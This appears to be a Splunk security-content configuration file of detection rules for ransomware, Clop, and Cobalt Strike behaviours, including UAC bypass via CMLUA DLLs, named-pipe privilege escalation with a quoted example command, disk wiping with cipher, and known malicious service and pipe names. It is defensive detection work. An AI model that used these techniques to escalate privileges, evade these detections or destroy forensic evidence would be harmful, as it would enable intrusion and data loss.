action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 90}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 90}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 90}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Clear Unallocated Sector Using Cipher App - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1070.004", "T1070"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = this search is to detect execution of `cipher.exe` to clear the unallocated sectors of a specific disk. This technique was seen in some ransomware to make it impossible to forensically recover deleted files. action.notable.param.rule_title = Clear Unallocated Sector Using Cipher App action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cipher.exe" Processes.process = "*/w:*" by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.process Processes.dest Processes.user Processes.process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clear_unallocated_sector_using_cipher_app_filter` [ESCU - Clop Common Exec Parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytics are designed to identifies some CLOP ransomware variant that using arguments to execute its main code or feature of its code. In this variant if the parameter is "runrun", CLOP ransomware will try to encrypt files in network shares and if it is "temp.dat", it will try to read from some stream pipe or file start encrypting files within the infected local machines. This technique can be also identified as an anti-sandbox technique to make its code non-responsive since it is waiting for some parameter to execute properly. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytics are designed to identifies some CLOP ransomware variant that using arguments to execute its main code or feature of its code. In this variant if the parameter is "runrun", CLOP ransomware will try to encrypt files in network shares and if it is "temp.dat", it will try to read from some stream pipe or file start encrypting files within the infected local machines. This technique can be also identified as an anti-sandbox technique to make its code non-responsive since it is waiting for some parameter to execute properly. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Operators can execute third party tools using these parameters. action.escu.creation_date = 2023-03-17 action.escu.modification_date = 2023-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Clop Common Exec Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Clop Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ attempting using arguments to execute its main code or feature of its code related to Clop ransomware. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 100}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Clop Common Exec Parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytics are designed to identifies some CLOP ransomware variant that using arguments to execute its main code or feature of its code. In this variant if the parameter is "runrun", CLOP ransomware will try to encrypt files in network shares and if it is "temp.dat", it will try to read from some stream pipe or file start encrypting files within the infected local machines. This technique can be also identified as an anti-sandbox technique to make its code non-responsive since it is waiting for some parameter to execute properly. action.notable.param.rule_title = Clop Common Exec Parameter action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name != "*temp.dat*" Processes.process = "*runrun*" OR Processes.process = "*temp.dat*" by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_common_exec_parameter_filter` [ESCU - Clop Ransomware Known Service Name - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection is to identify the common service name created by the CLOP ransomware as part of its persistence and high privilege code execution in the infected machine. Ussually CLOP ransomware use StartServiceCtrlDispatcherW API in creating this service entry. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection is to identify the common service name created by the CLOP ransomware as part of its persistence and high privilege code execution in the infected machine. Ussually CLOP ransomware use StartServiceCtrlDispatcherW API in creating this service entry. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the Service name, Service File Name Service Start type, and Service Type from your endpoints. action.escu.known_false_positives = unknown action.escu.creation_date = 2021-03-17 action.escu.modification_date = 2021-03-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Clop Ransomware Known Service Name - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Clop Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of a known Clop Ransomware Service Name detected on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Clop Ransomware Known Service Name - Rule action.correlationsearch.annotations = {"analytic_story": ["Clop Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection is to identify the common service name created by the CLOP ransomware as part of its persistence and high privilege code execution in the infected machine. Ussually CLOP ransomware use StartServiceCtrlDispatcherW API in creating this service entry. action.notable.param.rule_title = Clop Ransomware Known Service Name action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_system` EventCode=7045 Service_Name IN ("SecurityCenterIBM", "WinCheckDRVs") | stats count min(_time) as firstTime max(_time) as lastTime by dest EventCode Service_File_Name Service_Name Service_Start_Type Service_Type | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `clop_ransomware_known_service_name_filter` [ESCU - CMD Carry Out String Command Parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies command-line arguments where `cmd.exe /c` is used to execute a program. `cmd /c` is used to run commands in MS-DOS and terminate after command or process completion. This technique is commonly seen in adversaries and malware to execute batch command using different shell like PowerShell or different process other than `cmd.exe`. This is a good hunting query for suspicious command-line made by a script or relative process execute it. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be high based on legitimate scripted code in any environment. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - CMD Carry Out String Command Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AsyncRAT", "Winter Vivern", "WhisperGate", "Living Off The Land", "DarkGate Malware", "ProxyNotShell", "Log4Shell CVE-2021-44228", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "IcedID", "Chaos Ransomware", "PlugX", "Azorult", "Qakbot", "Hermetic Wiper", "Warzone RAT", "DarkCrystal RAT", "CISA AA23-347A", "Data Destruction"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CMD Carry Out String Command Parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["AsyncRAT", "Winter Vivern", "WhisperGate", "Living Off The Land", "DarkGate Malware", "ProxyNotShell", "Log4Shell CVE-2021-44228", "NjRAT", "RedLine Stealer", "Rhysida Ransomware", "IcedID", "Chaos Ransomware", "PlugX", "Azorult", "Qakbot", "Hermetic Wiper", "Warzone RAT", "DarkCrystal RAT", "CISA AA23-347A", "Data Destruction"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2021-44228"], "impact": 60, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059.003", "T1059"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` AND Processes.process="* /c*" by Processes.dest Processes.user Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_carry_out_string_command_parameter_filter` [ESCU - CMD Echo Pipe - Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\.\Pipe\5erg53`. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1059.003", "T1543.003", "T1543"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\.\Pipe\5erg53`. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Unknown. It is possible filtering may be required to ensure fidelity. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - CMD Echo Pipe - Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ by user $user$ potentially performing privilege escalation using named pipes related to Cobalt Strike and other frameworks. action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 64}, {"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 64}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 64}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CMD Echo Pipe - Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["BlackByte Ransomware", "Cobalt Strike", "Graceful Wipe Out Attack"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1059", "T1059.003", "T1543.003", "T1543"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This analytic identifies a common behavior by Cobalt Strike and other frameworks where the adversary will escalate privileges, either via `jump` (Cobalt Strike PTH) or `getsystem`, using named-pipe impersonation. A suspicious event will look like `cmd.exe /c echo 4sgryt3436 > \\.\Pipe\5erg53`. action.notable.param.rule_title = CMD Echo Pipe - Escalation action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where `process_cmd` OR Processes.process=*%comspec%* (Processes.process=*echo* AND Processes.process=*pipe*) by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name Processes.process_name Processes.original_file_name Processes.process Processes.process_id Processes.parent_process_id | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmd_echo_pipe___escalation_filter` [ESCU - Cmdline Tool Not Executed In CMD Shell - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning `ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administator. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning `ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administator. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = A network operator or systems administrator may utilize an automated host discovery application that may generate false positives. Filter as needed. action.escu.creation_date = 2023-12-27 action.escu.modification_date = 2023-12-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Cmdline Tool Not Executed In CMD Shell - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Volt Typhoon", "Rhysida Ransomware", "FIN7", "DarkGate Malware", "Qakbot", "CISA AA22-277A", "CISA AA23-347A"] action.risk = 1 action.risk.param._risk_message = A non-standard parent process $parent_process_name$ spawned child process $process_name$ to execute command-line tool on $dest$. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 56}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 56}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 56}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 56}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cmdline Tool Not Executed In CMD Shell - Rule action.correlationsearch.annotations = {"analytic_story": ["Volt Typhoon", "Rhysida Ransomware", "FIN7", "DarkGate Malware", "Qakbot", "CISA AA22-277A", "CISA AA23-347A"], "cis20": ["CIS 10"], "confidence": 80, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059", "T1059.007"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies a non-standard parent process (not matching CMD, PowerShell, or Explorer) spawning `ipconfig.exe` or `systeminfo.exe`. This particular behavior was seen in FIN7's JSSLoader .NET payload. This is also typically seen when an adversary is injected into another process performing different discovery techniques. This event stands out as a TTP since these tools are commonly executed with a shell application or Explorer parent, and not by another application. This TTP is a good indicator for an adversary gathering host information, but one possible false positive might be an automated tool used by a system administator. action.notable.param.rule_title = Cmdline Tool Not Executed In CMD Shell action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process_name = "ipconfig.exe" OR Processes.process_name = "systeminfo.exe" OR Processes.process_name = "net.exe" OR Processes.process_name = "net1.exe" OR Processes.process_name = "arp.exe" OR Processes.process_name = "nslookup.exe" OR Processes.process_name = "route.exe" OR Processes.process_name = "netstat.exe" OR Processes.process_name = "whoami.exe") AND NOT (Processes.parent_process_name = "cmd.exe" OR Processes.parent_process_name = "powershell*" OR Processes.parent_process_name="pwsh.exe" OR Processes.parent_process_name = "explorer.exe") by Processes.parent_process_name Processes.parent_process Processes.process_name Processes.original_file_name Processes.process_id Processes.process Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmdline_tool_not_executed_in_cmd_shell_filter` [ESCU - CMLUA Or CMSTPLUA UAC Bypass - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects a potential process using COM Object like CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges to its running process. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic detects a potential process using COM Object like CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges to its running process. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name and imageloaded executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = Legitimate windows application that are not on the list loading this dll. Filter as needed. action.escu.creation_date = 2021-05-13 action.escu.modification_date = 2021-05-13 action.escu.confidence = high action.escu.full_search_name = ESCU - CMLUA Or CMSTPLUA UAC Bypass - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["DarkSide Ransomware", "Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = The following module $ImageLoaded$ was loaded by a non-standard application on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 80}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - CMLUA Or CMSTPLUA UAC Bypass - Rule action.correlationsearch.annotations = {"analytic_story": ["DarkSide Ransomware", "Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 100, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1218", "T1218.003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic detects a potential process using COM Object like CMLUA or CMSTPLUA to bypass UAC. This technique has been used by ransomware adversaries to gain administrative privileges to its running process. action.notable.param.rule_title = CMLUA Or CMSTPLUA UAC Bypass action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventCode=7 ImageLoaded IN ("*\\CMLUA.dll", "*\\CMSTPLUA.dll", "*\\CMLUAUTIL.dll") NOT(process_name IN("CMSTP.exe", "CMMGR32.exe")) NOT(Image IN("*\\windows\\*", "*\\program files*")) | stats count min(_time) as firstTime max(_time) as lastTime by dest Image ImageLoaded process_name EventCode Signed ProcessId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cmlua_or_cmstplua_uac_bypass_filter` [ESCU - Cobalt Strike Named Pipes - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the use of default or publicly known named pipes used with Cobalt Strike. A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Cobalt Strike uses named pipes in many ways and has default values used with the Artifact Kit and Malleable C2 Profiles. The following query assists with identifying these default named pipes. Each EDR product presents named pipes a little different. Consider taking the values and generating a query based on the product of choice. \ Upon triage, review the process performing the named pipe. If it is explorer.exe, It is possible it was injected into by another process. Review recent parallel processes to identify suspicious patterns or behaviors. A parallel process may have a network connection, review and follow the connection back to identify any file modifications. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the use of default or publicly known named pipes used with Cobalt Strike. A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Cobalt Strike uses named pipes in many ways and has default values used with the Artifact Kit and Malleable C2 Profiles. The following query assists with identifying these default named pipes. Each EDR product presents named pipes a little different. Consider taking the values and generating a query based on the product of choice. \ Upon triage, review the process performing the named pipe. If it is explorer.exe, It is possible it was injected into by another process. Review recent parallel processes to identify suspicious patterns or behaviors. A parallel process may have a network connection, review and follow the connection back to identify any file modifications. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA. action.escu.known_false_positives = The idea of using named pipes with Cobalt Strike is to blend in. Therefore, some of the named pipes identified and added may cause false positives. Filter by process name or pipe name to reduce false positives. action.escu.creation_date = 2023-07-10 action.escu.modification_date = 2023-07-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Cobalt Strike Named Pipes - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Sysmon"] action.escu.analytic_story = ["Trickbot", "DarkSide Ransomware", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = An instance of $process_name$ was identified on endpoint $dest$ accessing known suspicious named pipes related to Cobalt Strike. action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Cobalt Strike Named Pipes - Rule action.correlationsearch.annotations = {"analytic_story": ["Trickbot", "DarkSide Ransomware", "Cobalt Strike", "BlackByte Ransomware", "Graceful Wipe Out Attack", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 90, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1055"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the use of default or publicly known named pipes used with Cobalt Strike. A named pipe is a named, one-way or duplex pipe for communication between the pipe server and one or more pipe clients. Cobalt Strike uses named pipes in many ways and has default values used with the Artifact Kit and Malleable C2 Profiles. The following query assists with identifying these default named pipes. Each EDR product presents named pipes a little different. Consider taking the values and generating a query based on the product of choice. \ Upon triage, review the process performing the named pipe. If it is explorer.exe, It is possible it was injected into by another process. Review recent parallel processes to identify suspicious patterns or behaviors. A parallel process may have a network connection, review and follow the connection back to identify any file modifications. action.notable.param.rule_title = Cobalt Strike Named Pipes action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `sysmon` EventID=17 OR EventID=18 PipeName IN (\\msagent_*, \\DserNamePipe*, \\srvsvc_*, \\postex_*, \\status_*, \\MSSE-*, \\spoolss_*, \\win_svc*, \\ntsvcs*, \\winsock*, \\UIA_PIPE*) | stats count min(_time) as firstTime max(_time) as lastTime by dest, process_name, process_id process_path, PipeName | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `cobalt_strike_named_pipes_filter` [ESCU - Common Ransomware Extensions - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic detects Searches for file modifications that commonly occur with Ransomware to detect modifications to files with extensions that are commonly used by Ransomware. The detection is made by searches for changes in the datamodel=Endpoint.Filesystem, specifically modifications to file extensions that match those commonly used by Ransomware. The detection is important because it suggests that an attacker is attempting to encrypt or otherwise modify files in the environment using malware, potentially leading to data loss that can cause significant damage to an organization's data and systems. False positives might occur so the SOC must investigate the affected system to determine the source of the modification and take appropriate action to contain and remediate the attack. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1485"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic detects Searches for file modifications that commonly occur with Ransomware to detect modifications to files with extensions that are commonly used by Ransomware. The detection is made by searches for changes in the datamodel=Endpoint.Filesystem, specifically modifications to file extensions that match those commonly used by Ransomware. The detection is important because it suggests that an attacker is attempting to encrypt or otherwise modify files in the environment using malware, potentially leading to data loss that can cause significant damage to an organization's data and systems. False positives might occur so the SOC must investigate the affected system to determine the source of the modification and take appropriate action to contain and remediate the attack. action.escu.how_to_implement = You must be ingesting data that records the filesystem activity from your hosts to populate the Endpoint Filesystem data model node. To see the additional metadata, add the following fields, if not already present, please review the detailed documentation on how to create a new field within Incident Review may be found here: `https://docs.splunk.com/Documentation/ES/5.3.0/Admin/Customizenotables#Add_a_field_to_the_notable_event_details` action.escu.known_false_positives = It is possible for a legitimate file with these extensions to be created. If this is a true ransomware attack, there will be a large number of files created with these extensions. action.escu.creation_date = 2022-11-10 action.escu.modification_date = 2022-11-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Common Ransomware Extensions - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["SamSam Ransomware", "Ryuk Ransomware", "Ransomware", "Clop Ransomware", "Prestige 